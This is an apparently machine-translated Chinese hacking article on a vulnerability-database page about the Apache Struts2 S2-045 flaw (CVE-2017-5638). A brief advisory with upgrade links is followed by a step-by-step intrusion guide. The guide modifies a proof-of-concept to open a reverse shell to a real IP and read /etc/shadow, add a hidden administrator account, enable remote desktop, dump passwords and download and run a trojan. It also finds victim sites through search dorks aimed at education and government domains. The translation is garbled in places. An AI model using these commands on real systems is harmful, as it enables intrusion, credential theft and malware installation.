Lucene search

K
myhack58佚名MYHACK58:62201784086
HistoryMar 08, 2017 - 12:00 a.m.

How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net

2017-03-0800:00:00
佚名
www.myhack58.com
3207

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

1.1 CVE-2017-5638 vulnerability profile
Apache Struts 2 is the world’s most popular JavaWeb Server framework. However, in Struts 2 found that the presence of high-risk security vulnerability, CVE-2017-5638,S02-45,and the vulnerability impact to: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts2. 5. 10
Vulnerability ID: CVE-2017-5638
Vulnerability rating: HIGH
Vulnerability name: S2-045: Struts 2 remote code execution vulnerability
Vulnerability impact: based on the JakartaMultipart the parser implementation file upload when possible RCE
Affected version: Struts 2.3.5-Struts 2.3.31
The Struts 2.5-Struts 2.5.10
Repair solutions:
Upgrade to Struts2. 3. 32 or the Struts 2.5.10.1
Struts2. 3. 32 download address:
https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32
Struts2. 5. 10. 1 Download: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1
The vulnerability principle: Struts2 default parse the uploaded file’s Content-Type header, there is a problem. In the Parse error case, the error information in the OGNL code.
1.2 hazard assessment
After the actual test, as long as the vulnerability exists for windows and linux are Server Permissions. Great harm, to be sure for many people tonight is a sleepless night.

  1. 3 vulnerabilities in the actual use of 1. 3. 1 Ready to work
    1. Get ready for a jsp webshell, the Save on the site, for example, may be 1. txt and other text file, for network download.
    2. Ready to have a separate IP of the server, 在上面有nc.exe the.
    3. Prepare python environment.
    General use python2. 7. 13 version, download address: https://www.python.org/downloads/release/python-2713/, according to theoperating systemversion of the Select the installation, after the installation is complete first run will error, you need to install a module, shown in Figure 1. Need to install the poster. the encode module download address: https://pypi. python. org/pypi/poster/, the 然后 到 该 目录 执行 pythonsetup.py install, to install. Note that in python if you do not set system variables, you’ll need to strip the full path to execute. For example:
    C:\Python27\python.exeC:\Python27\poster-0.8.1\setup.py install
    ! [](/Article/UploadPic/2017-3/20173818228916. jpg? www. myhack58. com)
    Figure 1 The Missing poster. the encode module
    4. Get a variety of action page
    (1)by zoomeye to get a variety of action page to search the index. action, login. action, info. action and the like.
    (2)Baidu aunt law
    inurl:index. actionsite:edu. cn
    inurl:index. actionsite:gov. cn
    inurl:index. actionsite:com. cn
    Note: don’t vandalize, and now the network security method very good it!!!
    1.3.2 modify the poc exploit code
  2. For the linux version of the modified whoami values: bash-i>& /dev/tcp/122.115.47.39/4433 0>&1
    Description of 122. 115. 47. 39 for a rebound the Monitoring Server IP, port 4433, the 然后 将 文件 保存 为 poclinux.py as shown in Figure 2. Also there can be some other common commands: id, whomai, cat /etc/passwd, cat/etc/shadow, etc. You can modify the corresponding parameters and keep a different name.
    ! [](/Article/UploadPic/2017-3/20173818228744. jpg? www. myhack58. com)
    Figure 2 modify the linux poc exploit code
  3. Corresponding Windows Server, modify the whomai value:
    net user antian365$ Wsantian365!*/ add
    net localgroup administratorsantian365$ /add
    分别 将 poc 文件 保存 为 pocwin1.py and pocwin2.py as shown in Figure 3.
    ! [](/Article/UploadPic/2017-3/20173818228139. jpg? www. myhack58. com)
    Figure 3 modify the windows under the use of the code
    1.3.3 under Windows fast implement penetration
  4. Each other to open up 3389
    (1)scanning each other whether to open the 3389, open a, respectively, to execute:
    pocwin1.py http://www.myhack58.com/index.action
    pocwin2.py http://www.myhack58.com/index.action
    If the other loopholes, then it will directly add a user“antian365$”, password“Wsantian365!*”, the Server to open the 3389, sign up and then download wce64, directly wce64 –w to get the current login password, be sure to use administrator rights to execute.
    (2)directly on 3389
    In the parameters were modified three times, execute the following code three times, you can open 3389.
    wmic /namespace:\\root\cimv2\terminalservices pathwin32_terminalservicesetting where (__CLASS != “”) callsetallowtsconnections 1
    wmic/namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where(TerminalName =‘RDP-Tcp’) call setuserauthenticationrequired 1
    reg add"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f
    3389 is open on the condition that the other party is independent of the IP, if it is within the network IP the case of the second method.
  5. The Trojan executes the law
    (1)Download the Trojan
    First you need to prepare a Trojan program, you need to through win2008. Then modify the win. py in the whoami parameters:
    Germany /transfer myjob1/download /priority normal http://www.myhack58.com/ma.exe c:\windows\temp\ma.exe
    ma. exe save in www. myhack58. com web site root directory, it will download directly to the other party c:\windows\temp directory.
    (2)the execution of the Trojan, to modify the poc in the whoami parameters for the ma. exe to the true path and the address, as follows. Run save after the poc is in the original implementation.
    c:\windows\temp\ma.exe
    1.3. 4Linux under the rapid penetration of the ideas
  6. On a standalone server to perform monitoring, required in the independent IP on the server, execute“nc –vv–l –p 4433”, you can perform the connection about this IP the 4433 port. For example, http://www. myhack58. com:4433, if the listening port has data, it indicates the normal, otherwise check the firewall rules.
  7. Perform poc

[1] [2] [3] next

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%